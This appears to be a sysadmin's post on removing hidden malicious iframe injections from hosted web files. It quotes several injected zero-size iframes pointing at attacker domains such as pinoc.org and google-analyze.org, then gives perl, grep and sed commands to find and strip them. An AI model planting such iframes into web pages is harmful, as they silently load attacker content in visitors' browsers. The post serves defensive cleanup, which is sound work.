You'll find something like this:
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Or:
<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Or:
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):
find /PATH/TO/START/FROM/ -type f | xargs perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'
To remove using sed instead:
First we make a grep string that catches all of the iframe. I like egrep:
From:
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
To:
grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"
Note that the only difference between the strings is the domain they access. All of the files and options are the same. We use this to clean everything at once.
grep -HRE "<iframe src=\"http:\/\/.*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*
This should find ALL of the injections. Be sure to redirect the output to a text file for later. The option -lRE should make grep spit out just the names of files. Now we build our sed-line:
sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"
And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):
cat ~/thelist.txt | xargs sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"
This will output thelist.txt into xargs. Xargs will run the sed-line on every file in thelist.txt. Be sure to fix any paths with spaces or sed will break. If we're lucky, this should result in a clean home directory for your client :). If we aren't, well, hope you backed them up first! We can do this by adding -i.ext to the sed command:
cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"
I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verfied the iframes are gone a piece of cake and less hazardous to your client backups.
ich1 out.